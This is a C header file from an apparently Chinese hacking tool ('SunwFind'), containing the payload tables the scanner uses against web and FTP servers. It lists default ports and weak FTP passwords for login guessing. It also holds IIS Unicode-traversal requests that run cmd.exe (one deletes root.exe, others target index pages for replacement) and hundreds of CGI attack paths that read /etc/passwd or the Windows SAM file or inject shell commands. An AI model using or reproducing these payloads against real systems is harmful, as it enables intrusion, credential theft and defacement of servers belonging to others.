www.pudn.com > SunwFind.zip > UNICODE.H
//标准端口扫描中的默认端口
char *ports[10]={"21","80","53","25","79","23","110","1433","5631","3389"};
//unicode漏洞修改web文件的文件名
char * modify[5]={
"\\index.htm\r\n",
"\\index.asp\r\n",
"\\default.htm\r\n",
"\\default.asp\r\n",
"GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+del+root.exe\r\n"
};
//ftp登陆简单密码
char * ftppass[10]=
{
"",
"123",
"1234",
"12345",
"abcd",
"administrator",
"password",
"admin",
"123456",
"abc"
};
//进度条
char *planx[8]=
{
" - ",
" \\ ",
" | ",
" / ",
" - ",
" \\ ",
" | ",
" / "
};
//CGI漏洞
char *cgiholes[648]=
{
"/.pl",
"/*.ida",
"/*.idc",
"/*.idq",
"/........../autoexec.bat",
"/....../",
"/....../all",
"/....../etc/hosts",
"/../../../../../../../boot.ini",
"/../../../../../winnt/repair/sam._",
"/../../../../config.sys",
"/../../../../etc/hosts",
"/.access",
"/.bash_history",
"/.htaccess",
"/.htpasswd",
"/.passwd",
"/?PageServices",
"/_AuthChangeUrl",
"/_AuthChangeUrl?",
"/scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir",
"/_mem_bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir",
"/_mem_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir",
"/_mem_bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir",
"/_mem_bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir",
"/_mem_bin/../../../../winnt/system32/cmd.exe?/c+dir",
"/_mem_bin/..?..?..?../winnt/system32/cmd.exe?/c+dir",
"/_mem_bin/.._../winnt/system32/cmd.exe?/c+dir",
"/_private",
"/_private/form_results.txt",
"/_private/orders.txt",
"/_private/register.txt",
"/_private/registrations.txt",
"/_vti_bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir",
"/_vti_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir",
"/_vti_bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir",
"/_vti_bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir",
"/_vti_bin/../../../../winnt/system32/cmd.exe?/c+dir",
"/_vti_bin/..?..?..?../winnt/system32/cmd.exe?/c+dir",
"/_vti_bin/.._../winnt/system32/cmd.exe?/c+dir",
"/_vti_bin/_vti_aut/dvwssr.dll",
//"/_vti_bin/fpcount.exe",
"/_vti_bin/fpexe",
"/_vti_bin/shtml.dll",
"/_vti_bin/shtml.dll/_vti_rpc",
"/_vti_bin/shtml.exe",
"/_vti_inf.html",
"/_vti_pvt",
"/_vti_pvt/",
"/_vti_pvt/administrator.pwd",
"/_vti_pvt/administrators.pwd",
"/_vti_pvt/author.log",
"/_vti_pvt/authors.pwd",
"/_vti_pvt/doctodep.btr",
"/_vti_pvt/service.grp",
"/_vti_pvt/service.pwd",
"/_vti_pvt/shtml.dll",
"/_vti_pvt/shtml.exe",
"/_vti_pvt/users.pwd",
"/~bin",
"/~ftp",
"/~guest",
"/~log",
"/~logs",
"/~lp",
"/~named",
"/~root",
"/~test",
"/~tmp",
"/abczxv.htw",
"/Admin_files/order.log",
"/admisapi/fpadmin.htm",
"/adsamples/config/site.csc",
"/AdvWorks/equipment/catalog_type.asp",
"/app.cfm",
"/ASPSamp/AdvWorks/equipment/catalog_type.asp",
"/autoexec.bat",
"/bb-dnbd/bb-hist.sh",
"/bdir.htr",
"/bin",
"/bin/scripts/../../../../winnt/system32/cmd.exe?/c+dir",
"/bin/scripts/..?..?..?../winnt/system32/cmd.exe?/c+dir",
"/bin/scripts/.._../winnt/system32/cmd.exe?/c+dir",
"/bin/scripts/openvendor/gnete/RetrievePNBody.asp",
"/blabla.idq",
"/carbo.dll",
"/catalog.nsf",
"/catalog.nsf/",
"/ccbill/secure/ccbill.log",
"/cfappman/index.cfm",
"/cfcache.map",
"/cfdocs/cfmlsyntaxcheck.cfm",
"/cfdocs/exampleapp/docs/sourcewindow.cfm",
"/cfdocs/exampleapp/email/getfile.cfm",
"/cfdocs/exampleapp/email/getfile.cfm?filename=c:\boot.ini",
"/cfdocs/exampleapp/publish/admin/addcontent.cfm",
"/cfdocs/examples/cvbeans/beaninfo.cfm",
"/cfdocs/examples/httpclient/mainframeset.cfm",
"/cfdocs/examples/parks/detail.cfm",
"/cfdocs/expelval/displayopenedfile.cfm",
"/cfdocs/expelval/exprcalc.cfm",
"/cfdocs/expelval/openfile.cfm",
"/cfdocs/expelval/sendmail.cfm",
"/cfdocs/expeval/displayopenedfile.cfm",
"/cfdocs/expeval/eval.cfm",
"/cfdocs/expeval/ExprCalc.cfm",
"/cfdocs/expeval/exprcalc.cfm",
"/cfdocs/expeval/openfile.cfm",
"/cfdocs/expeval/sendmail.cfm",
"/cfdocs/root.cfm",
"/cfdocs/snippets/evaluate.cfm",
"/cfdocs/snippets/fileexists.cfm",
"/cfdocs/snippets/gettempdirectory.cfm",
"/cfdocs/snippets/viewexample.cfm",
"/cfide/administrator/index.cfm",
"/cfusion/cfapps/forums/data/forums.mdb",
"/cfusion/cfapps/security/data/realm.mdb",
"/cfusion/cfapps/security/realm_.mdb",
"/cfusion/database/cfsnippets.mdb",
"/cfusion/database/cypress.mdb",
"/cfusion/database/smpolicy.mdb",
"/cgi",
"/cgibin",
"/cgi-bin",
"/Cgi-Bin/",
"/cgi-bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir",
"/cgi-bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir",
"/cgi-bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir",
"/cgi-bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir",
"/cgi-bin/../../../../winnt/system32/cmd.exe?/c+dir",
"/cgi-bin/..?..?..?../winnt/system32/cmd.exe?/c+dir",
"/cgi-bin/.._../winnt/system32/cmd.exe?/c+dir",
"/cgi-bin/add_ftp.cgi",
"/cgi-bin/Admin_files/order.log",
"/cgi-bin/adp",
"/cgi-bin/adpassword.txt",
"/cgi-bin/ads.setup",
"/cgi-bin/aglimpse",
"/Cgi-Bin/aglimpse.cgi",
"/cgi-bin/aglimpse.cgi",
"/Cgi-Bin/alibaba.pl",
"/cgi-bin/alibaba.pl",
"/cgi-bin/allmanage.pl",
"/cgi-bin/allmanage/adp",
"/cgi-bin/allmanage/k",
"/cgi-bin/allmanage/settings.cfg",
"/cgi-bin/allmanage/userfile.dat",
"/cgi-bin/allmanageup.pl",
"/cgi-bin/AnyBoard.cgi",
"/cgi-bin/anyboard.cgi",
"/cgi-bin/AnyForm",
"/cgi-bin/AnyForm.cgi",
"/cgi-bin/AnyForm2",
"/cgi-bin/archie",
"/cgi-bin/architext_query.pl",
"/cgi-bin/ash",
"/cgi-bin/AT-admin.cgi",
"/cgi-bin/AT-generate.cgi",
"/cgi-bin/authorize/dbmfiles/users",
"/cgi-bin/ax.cgi",
"/cgi-bin/ax-admin.cgi",
"/cgi-bin/axs.cgi",
"/cgi-bin/bash",
"/cgi-bin/bb-hist.sh",
"/cgi-bin/bigconf.cgi",
"/cgi-bin/bigconf.cgi",
"/cgi-bin/bizdb1-search.cgi",
"/cgi-bin/bnbform",
"/cgi-bin/bnbform.cgi",
"/cgi-bin/cachemgr.cgi",
"/cgi-bin/calendar",
"/cgi-bin/calender.pl",
"/cgi-bin/calender_admin.pl",
"/cgi-bin/campas",
"/cgi-bin/carbodll",
"/cgi-bin/cart.pl",
"/cgi-bin/ceilidh.exe/ceilidh/?N4",
"/cgi-bin/cgimail.exe",
"/Cgi-Bin/cgitest.exe",
"/cgi-bin/Cgitest.exe",
"/cgi-bin/cgiwrap",
"/cgi-bin/classified.cgi",
"/cgi-bin/classifieds",
"/cgi-bin/classifieds.cgi",
"/cgi-bin/clickresponder.pl",
"/Cgi-Bin/cmd.exe?/c+dir",
"/cgi-bin/cmd.exe?/c+dir",
"/Cgi-Bin/cmd32.exe",
"/Cgi-Bin/cmd32.exe?/c+dir",
"/cgi-bin/Count.cgi",
"/Cgi-Bin/count.cgi",
"/cgi-bin/counterfiglet",
"/Cgi-Bin/csh",
"/cgi-bin/csh",
"/cgi-bin/date",
"/cgi-bin/day5datacopier.cgi",
"/cgi-bin/day5datanotifier.cgi",
"/cgi-bin/day5notifier",
"/cgi-bin/dbmlparser.exe",
"/cgi-bin/dig.cgi",
"/cgi-bin/dnewsweb",
"/cgi-bin/download.cgi",
"/cgi-bin/dumpenv.pl",
"/Cgi-Bin/echo.bat",
"/cgi-bin/edit.pl",
"/Cgi-Bin/enivron.pl",
"/cgi-bin/environ.cgi",
"/cgi-bin/excite",
"/Cgi-Bin/ezshopper/loadpage.cgi",
"/Cgi-Bin/ezshopper/search.cgi",
"/cgi-bin/faxsurvey",
"/Cgi-Bin/faxsurvey",
"/cgi-bin/filemail",
"/cgi-bin/filemail.pl",
"/cgi-bin/files.pl",
"/cgi-bin/finger",
"/cgi-bin/finger.cgi",
"/cgi-bin/finger.pl",
"/cgi-bin/flexform",
"/cgi-bin/flexform.cgi",
"/Cgi-Bin/FormHandler.cgi",
"/cgi-bin/FormHandler.cgi",
"/Cgi-Bin/formmail",
"/Cgi-Bin/formmail.cgi",
"/Cgi-Bin/formmail.pl",
"/cgi-bin/formmail.pl",
"/cgi-bin/fortune",
"/cgi-bin/fpcount.exe",
"/cgi-bin/fpexplore.exe",
"/cgi-bin/fpexplorer.exe",
"/cgi-bin/ftp/ftp.pl",
"/Cgi-Bin/get32.exe",
"/cgi-bin/get32.exe",
"/cgi-bin/gH.cgi",
"/cgi-bin/glimpse",
"/cgi-bin/guestbook",
"/cgi-bin/guestbook.cgi",
"/cgi-bin/guestbook.pl",
"/cgi-bin/handler",
"/cgi-bin/handler.cgi"
"/Cgi-Bin/hello.bat",
"/Cgi-Bin/htimage.exe",
"/cgi-bin/htimage.exe",
"/cgi-bin/htmlscript",
"/cgi-bin/htmlscript?../../../../etc/passwd",
"/Cgi-Bin/htsearch",
"/cgi-bin/htsearch",
"/cgi-bin/iisadmpwd/achg.htr",
"/cgi-bin/iisadmpwd/aexp.htr",
"/cgi-bin/iisadmpwd/aexp2.htr",
"/cgi-bin/iisadmpwd/anot.htr",
"/cgi-bin/imagemap.exe",
"/cgi-bin/info2www",
"/cgi-bin/infosrch.cgi",
"/cgi-bin/input.bat",
"/cgi-bin/input2.bat",
"/Cgi-Bin/jj",
"/cgi-bin/k",
"/Cgi-Bin/ksh",
"/cgi-bin/ksh",
"/Cgi-Bin/loadpage.cgi",
"/cgi-bin/loadpage.cgi",
"/cgi-bin/lwgate",
"/cgi-bin/LWGate.cgi",
"/cgi-bin/lwgate.cgi",
"/cgi-bin/MachineInfo"
"/cgi-bin/mail",
"/cgi-bin/mailform.exe",
"/cgi-bin/maillist.pl",
"/cgi-bin/makechanges/easysteps/easysteps.pl",
"/cgi-bin/man.sh",
"/cgi-bin/mlog.phtml",
"/cgi-bin/mylog.phtml",
"/cgi-bin/netstat",
"/cgi-bin/nlog-smb.pl",
"/cgi-bin/nph-error.pl",
"/cgi-bin/nph-publish",
"/cgi-bin/nph-test-cgi",
"/Cgi-Bin/nph-test-cgi",
"/cgi-bin/passwd",
"/cgi-bin/passwd.txt",
"/cgi-bin/password",
"/cgi-bin/password.dat",
"/cgi-bin/password.log",
"/cgi-bin/password.txt",
"/cgi-bin/perl",
"/Cgi-Bin/perl.exe",
"/cgi-bin/perl.exe",
"/cgi-bin/perlshop.cgi",
"/cgi-bin/pfdispaly.cgi",
"/cgi-bin/pfdisplay",
"/cgi-bin/pfdisplay.cgi",
"/Cgi-Bin/phf",
"/cgi-bin/phf",
"/cgi-bin/phf.cgi",
"/cgi-bin/phf.pp",
"/cgi-bin/photo_cfg.pl",
"/cgi-bin/php",
"/cgi-bin/php.cgi",
"/cgi-bin/phpscan",
"/cgi-bin/plusmail",
"/cgi-bin/postcard.pl",
"/cgi-bin/post-query",
"/cgi-bin/ppdscgi.exe",
"/cgi-bin/printenv",
"/cgi-bin/process_bug.cgi",
"/cgi-bin/query",
"/cgi-bin/redirect",
"/cgi-bin/responder",
"/cgi-bin/responder.cgi",
"/Cgi-Bin/rguest.exe",
"/cgi-bin/rguest.exe",
"/cgi-bin/rksh",
"/cgi-bin/rpm_query",
"/cgi-bin/rsh",
"/cgi-bin/rwwwshell.pl",
"/cgi-bin/sam._",
"/cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1",
"/cgi-bin/scripts/perl.exe",
"/Cgi-Bin/search.cgi",
"/cgi-bin/search.cgi",
"/cgi-bin/search97.vts",
"/cgi-bin/sendform.cgi",
"/cgi-bin/settings.cfg",
"/Cgi-Bin/sh",
"/cgi-bin/sh",
"/cgi-bin/shop.cgi",
"/cgi-bin/shop.cgi/page=../../../../etc/passwd",
"/cgi-bin/snorkerz.bat",
"/cgi-bin/snorkerz.cmd",
"/cgi-bin/sojourn",
"/Cgi-Bin/sojourn.cgi",
"/cgi-bin/status.cgi",
"/cgi-bin/survey",
"/cgi-bin/survey.cgi",
"/Cgi-Bin/tcsh",
"/cgi-bin/tcsh",
"/cgi-bin/test.bat",
"/Cgi-Bin/test.cgi",
"/Cgi-Bin/testcgi",
"/cgi-bin/test-cgi",
"/cgi-bin/test-cgi.tcl",
"/Cgi-Bin/test-cgi/*",
"/cgi-bin/test-cgi?*",
"/cgi-bin/test-env",
"/cgi-bin/textcounter.pl",
"/cgi-bin/tpgnrock",
"/cgi-bin/tst.bat",
"/cgi-bin/UltraBoard.cgi",
"/cgi-bin/UltraBoard.pl",
"/cgi-bin/unlg1.1",
"/cgi-bin/unlg1.2",
"/cgi-bin/upload.pl",
"/cgi-bin/uptime",
"/cgi-bin/user.dat",
"/cgi-bin/user.log",
"/cgi-bin/userfile.dat",
"/cgi-bin/view-source",
"/Cgi-Bin/view-source",
"/cgi-bin/visadmin.exe",
"/cgi-bin/visadmin.exe?user=guest",
"/cgi-bin/visitor.exe",
"/cgi-bin/w3-msql",
"/cgi-bin/w3-msql/",
"/cgi-bin/w3-sql",
"/cgi-bin/w3tvarspm",
"/cgi-bin/wais.pl",
"/cgi-bin/webbbs.cgi",
"/cgi-bin/webdist.cgi",
"/Cgi-Bin/webdist.cgi",
"/cgi-bin/webgais",
"/cgi-bin/webmap.cgi",
"/cgi-bin/webplus",
"/cgi-bin/websendmail",
"/cgi-bin/webwho.pl",
"/Cgi-Bin/wguest.exe",
"/cgi-bin/wguest.exe",
"/cgi-bin/whois_raw.cgi",
"/cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd",
"/Cgi-Bin/windmail.exe",
"/cgi-bin/windmail.exe",
"/Cgi-Bin/wrap",
"/cgi-bin/wrap",
"/cgi-bin/wrap.cgi",
"/cgi-bin/wwwadmin.pl",
"/cgi-bin/wwwboard.cgi",
"/cgi-bin/wwwboard.pl",
"/cgi-bin/www-sql",
"/cgi-bin/zsh",
"/cgi-dos/args.bat",
"/cgi-dos/args.cmd",
"/cgi-local",
"/cgi-shl/win-c-sample.exe",
"/cgi-src",
"/cgi-src/phf.c",
"/cgi-win",
"/cgi-win/perl.exe",
"/Cgi-Win/uploader.exe",
"/cgi-win/uploader.exe",
"/cgi-win/wguest.exe",
"/com1",
"/com2",
"/com3",
"/com4",
"/con/con",
"/config/checks.txt",
"/config/import.txt",
"/config/mountain.cfg",
"/config/orders.txt",
"/cool-logs/mlog.html",
"/cool-logs/mylog.html",
"/database.nsf",
"/default.asp%2e",
"/default.asp%2e%41sp",
"/default.asp%81",
"/default.asp",
"/default.asp::$DATA",
"/default.asp\\",
"/default.asp+.htr",
"/doc",
"/domcfg.nsf",
"/domcfg.nsf/",
"/domcfg.nsf/?open",
"/domlog.nsf",
"/domlog.nsf/",
"/ews/ews/architext_query.pl",
"/font9.css",
"/getfile.cfm",
"/GetFile.cfm?FT=Text&FST=Plain&FilePath=C:\\WINNT\\repair\\sam._",
"/global.asa+.htr",
"/head.css",
"/hosts.dat",
"/iisadmin/",
"/iisadmpwd/achg.htr",
"/IISADMPWD/achg.htr",
"/iisadmpwd/aexp.htr",
"/iisadmpwd/aexp2.htr",
"/iisadmpwd/aexp2b.htr",
"/iisadmpwd/aexp3.htr",
"/iisadmpwd/aexp4.htr",
"/iisadmpwd/aexp4b.htr",
"/iisadmpwd/anot.htr",
"/iisadmpwd/anot3.htr",
"/iishelp/iis/misc/iirturnh.htw",
"/iissamples/exair/howitworks/code.asp",
"/iissamples/exair/howitworks/codebrws.asp",
"/iissamples/exair/howitworks/showcode.asp",
"/iissamples/exair/search/advsearch.asp",
"/iissamples/exair/search/qfullhit.htw",
"/iissamples/exair/search/qsumrhit.htw",
"/iissamples/exair/search/query.idq",
"/IISSAMPLES/ExAir/Search/search.asp",
"/iissamples/exair/search/search.idq",
"/iissamples/iissamples/query.asp",
"/iissamples/issamples/fastq.idq",
"/iissamples/issamples/oop/qfullhit.htw",
"/iissamples/issamples/oop/qsumrhit.htw",
"/iissamples/issamples/query.asp",
"/iissamples/issamples/query.idq",
"/iissamples/sdk/asp/docs/codebrws.asp",
"/include/css.css",
"/include/head.html",
"/index.asp%2e",
"/index.asp%2e%41sp",
"/index.asp%81",
"/index.asp.",
"/index.asp::$DATA",
"/index.asp\\",
"/index.asp+.htr",
"/log",
"/log.nsf",
"/log.nsf/",
"/logs",
"/mailview.cgi?cmd=view&fldrname=inbox&select=1&html=../../../../../../etc/passwd",
"/main.asp%2e",
"/main.asp%2e%41sp",
"/main.asp%81",
"/main.asp.",
"/main.asp::$DATA",
"/main.asp\\",
"/main.asp+.htr",
"/mall_log_files/order.log",
"/manage/cgi/cgiproc",
"/msadc",
"/msadc/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir",
"/msadc/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir",
"/msadc/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir",
"/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir",
"/msadc/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir",
"/msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir",
"/msadc/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir",
"/msadc/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir",
"/msadc/..?../..?../..?../winnt/system32/cmd.exe?/c+dir",
"/msadc/..?..?..?../winnt/system32/cmd.exe?/c+dir",
"/msadc/.._../winnt/system32/cmd.exe?/c+dir",
"/msadc/msadcs.dll",
"/msadc/samples/adctest.asp",
"/msadc/Samples/SELECTOR/codebrws.cfm",
"/msadc/Samples/SELECTOR/showcode.asp",
"/msadc/samples/selector/showcode.asp",
"/msadc/samples/selector/showcode.asp_2",
"/msads/Samples/SELECTOR/showcode.asp",
"/msads/samples/selector/showcode.asp",
"/names.nsf",
"/names.nsf/Open",
"/navigate/ews/ews/architext_query.pl",
"/ncl_items.html",
"/null.htw",
"/order/order.log",
"/orders/checks.txt",
"/orders/import.txt",
"/orders/mountain.cfg",
"/Orders/order.log",
"/orders/order.log",
"/orders/orders.txt",
"/ows-bin/perlidlc.bat",
"/passwd",
"/passwd.txt",
"/password",
"/password.dat",
"/password.log",
"/password.txt",
"/PDG_Cart/order.log",
"/PDG_Cart/shopper.conf",
"/pfdispaly.cgi",
"/photoads/ads_data.pl",
"/photoads/cgi-bin/env.cgi",
"/ping",
"/piranha/secure/passwd.php3",
"/prxdocs/misc/prxrch.idq",
"/PSUser/PSCOErrPage.htm",
"/publisher/",
"/pw/storemgr.pw",
"/quikstore.cfg",
"/rightfax/fuwww.dll/",
"/robots.txt",
"/root",
"/samples/search/queryhit.htm",
"/script/.._../winnt/system32/cmd.exe?/c+dir",
"/scripts",
"/scripts/",
"/scripts/*",
"/scripts/*.pl",
"/scripts/..%c0%2f..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir",
"/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir",
"/scripts/..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir",
"/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir",
"/scripts/..%c1%1c..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir",
"/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir",
"/scripts/..%c1%9c..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir",
"/scripts/..%c1%9f../winnt/system32/cmd.exe?/c+dir",
"/scripts/../../../../../winnt/system32/cmd.exe?/c+dir",
"/scripts/../../cmd.exe?/c+dir",
"/scripts/../../winnt/system32/cmd.exe?/c+dir",
"/scripts/..?../winnt/system32/cmd.exe?/c+dir",
"/scripts/..?..?..?..?../winnt/system32/cmd.exe?/c+dir",
"/scripts/.._../winnt/system32/cmd.exe?/c+dir",
"/scripts/c32web.exe/ChangeAdminPassword",
"/scripts/cart32.exe/cart32clientlist",
"/scripts/CGImail.exe",
"/scripts/cmd.exe?/c+dir",
"/scripts/cmd32.exe",
"/scripts/cmd32.exe?/c+dir",
"/scripts/convert.bas",
"/scripts/counter.exe",
"/scripts/cpshost.dll",
"/scripts/dbman/db.cgi?db=invalid-db",
"/scripts/emurl/RECMAN.dll",
"/scripts/environ.pl",
"/scripts/fpcount.exe",
"/scripts/htimage.exe",
"/scripts/iisadmin/bdir.htr",
"/scripts/iisadmin/ism.dll",
"/scripts/iisadmin/ism.dll?http/dir",
"/scripts/iisadmin/tools/ctss.idc",
"/scripts/iisadmin/tools/getdrvrs.exe",
"/scripts/iisadmin/tools/mkilog.exe",
"/scripts/issadmin/bdir.htr",
"/scripts/lsass.exe",
"/scripts/no-such-file.pl",
"/scripts/perl",
"/scripts/pfieffer.bat",
"/scripts/pfieffer.cmd",
"/scripts/postinfo.asp",
"/scripts/proxy/w3proxy.dll",
"/scripts/repost.asp",
"/scripts/rguest.exe",
"/scripts/samples/ctguestb.idc",
"/scripts/samples/details.idc",
"/scripts/samples/search/author.idq",
"/scripts/samples/search/filesize.idq",
"/scripts/samples/search/filetime.idq",
"/scripts/samples/search/qfullhit.htw",
"/scripts/samples/search/qsumrhit.htw",
"/scripts/samples/search/query.idq",
"/scripts/samples/search/queryhit.idq",
"/scripts/samples/search/simple.idq",
"/scripts/samples/search/webhits.exe",
"/scripts/slxweb.dll",
"/scripts/srchadm/webhits.exe",
"/scripts/tools/dsnform.exe",
"/scripts/tools/getdrvrs.exe",
"/scripts/tools/getdrvs.exe",
"/scripts/tools/mkilog.exe",
"/scripts/tools/newdsn.exe",
"/scripts/tools/uploadn.asp",
"/scripts/tools/uploadx.asp",
"/scripts/upload.asp",
"/scripts/uploadn.asp",
"/scripts/uploadx.asp",
"/scripts/visadmin.exe",
"/scripts/wa.exe",
"/scripts/webbbs.exe",
"/scripts/wguest.exe",
"/scripts/wsisa.dll",
"/search",
"/search97.vts",
"/secure/.htaccess",
"/secure/.wwwacl",
"/server-info",
"/server-status",
"/session/adminlogin",
"/showfile.asp",
"/smdata.dat",
"/ssi/envout.bat",
"/today.nsf",
"/tree.dat",
"/user.dat",
"/user.log",
"/userreg.cgi?cmd=insert>/etc/passwd",
"/usr/local/apache/share/htdocs/.htaccess",
"/web_store.cgi",
"/WebShop/logs/cc.txt",
"/WebShop/logs/ck.log",
"/WebShop/templates/cc.txt",
"/WebSTAR",
"/whois_raw.cgi",
"/ws_ftp.ini",
"/wwwboard.pl",
"/wwwboard/passwd.txt",
"/.html/............*/config.sys",
"/.html/............./config.sys",
"/.html/............/autoexec.bat",
"/....../autoexec.bat",
"/....../config.sys",
"/cgi-bin/GW5",
"/cgi-bin/GW5/GWWEB.EXE",
"/cgi-bin/GWWEB.EXE"
};